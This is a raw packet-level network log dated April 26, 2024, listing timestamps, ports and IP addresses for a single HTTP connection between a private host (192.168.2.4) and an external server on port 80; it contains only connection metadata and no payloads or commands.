Apr 26, 2024 23:09:03.915508986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.915519953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.915551901 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.915996075 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.916008949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.916019917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.916030884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.916043043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.916043043 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.916059971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.916151047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.916162968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.916172981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.916191101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.916204929 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.916210890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.916234016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.916255951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.916268110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.916269064 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.916311979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.916346073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.916359901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.916397095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.916399956 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.917292118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.917304039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.917326927 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.917678118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.917690039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.917712927 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.917748928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.917778969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.917783022 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.917804003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.917838097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.917848110 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.917854071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.917885065 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.917906046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.917918921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.917953014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.917970896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918010950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918047905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.918057919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918071032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918092012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918108940 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.918184996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918196917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918207884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918216944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.918220043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918241024 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.918275118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918312073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.918315887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918329000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918340921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918360949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918366909 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.918399096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.918497086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918509960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918549061 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.918584108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918596983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918622971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.918627024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918669939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918682098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918709040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.918720007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918755054 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.918771982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918783903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918795109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918838978 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.918843031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918855906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918891907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.918908119 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918920040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918941021 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.918960094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.918993950 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.919013977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.919025898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.919034958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.919049025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.919059992 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.919070959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.919092894 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.919176102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.919214010 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.919229031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.919301987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.919312954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.919348955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.919362068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.919395924 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.919410944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.919428110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.919465065 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.919487953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.919511080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.919539928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.919555902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.919591904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.919605017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.919637918 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.919642925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.919655085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.919666052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.919678926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.919692039 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.919708967 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.919739962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.919770002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.919781923 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.919820070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.919831991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.919856071 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.919886112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.919919014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.919955015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.919969082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.920006037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.920011997 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.920020103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.920032024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.920053959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.920068979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.920077085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.920093060 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.920109034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.920149088 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.920173883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.920236111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.920277119 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.920310974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.920325041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.920357943 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.920603037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.920676947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.920713902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.920857906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.920876026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.920907974 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.920933008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.920947075 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.920984983 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.921113968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.921127081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.921154976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.921164989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.921168089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.921196938 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.921303988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.921346903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.921380043 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.921399117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.921442986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.921477079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.921480894 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.921536922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.921566963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.921580076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.921580076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.921602964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.921610117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.921638966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.921668053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.921680927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.921681881 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.921704054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.921713114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.921750069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.921792030 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.980036020 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.027606964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.064487934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.064547062 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.064564943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.106086969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.126980066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.127038002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.127079964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.127105951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.127165079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.127202988 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.127240896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.168570995 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.170855045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.170909882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.170948982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.171026945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.171137094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.171173096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.171197891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.171274900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.171310902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.171312094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.171437025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.171473980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.171509027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.171592951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.171627045 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.171714067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.171763897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.171799898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.172050953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.172152042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.172202110 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.172235966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.172296047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.172334909 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.172367096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.172422886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.172461987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.172466993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.172523022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.172559023 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.172589064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.172646999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.172681093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.172730923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.172789097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.172828913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.172864914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.172955990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.172991991 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.173027039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.173075914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.173111916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.173193932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.173269987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.173307896 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.173326969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.173460960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.173495054 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.173562050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.173652887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.173686028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.173722982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.173832893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.173871040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.173906088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.173990965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.174031973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.174051046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.174097061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.174145937 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.174161911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.174278021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.174314022 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.174339056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.174412012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.174453974 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.174458981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.174515009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.174541950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.174556971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.174643040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.174678087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.174715996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.174822092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.174858093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.174858093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.174972057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.175007105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.175031900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.175143957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.175179005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.175206900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.175282001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.175317049 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.175335884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.175352097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.175384998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.175424099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.175501108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.175539970 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.175565004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.175627947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.175666094 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.175704002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.175802946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.175836086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.175874949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.176381111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.176419020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.176439047 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.176465034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.176498890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.176757097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.176944017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.176978111 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.177067041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.177129984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.177162886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.177309036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.177397013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.177433014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.177613974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.177779913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.177815914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.177917004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.178023100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.178061008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.178260088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.178311110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.178345919 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.178394079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.178919077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.178953886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.179008961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.179086924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.179121017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.179368019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.179529905 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.179552078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.179598093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.179627895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.179668903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.179693937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.179737091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.179774046 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.179809093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.179897070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.179933071 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.180011988 CEST	80	49734	176.97.76.106	192.168.2.4
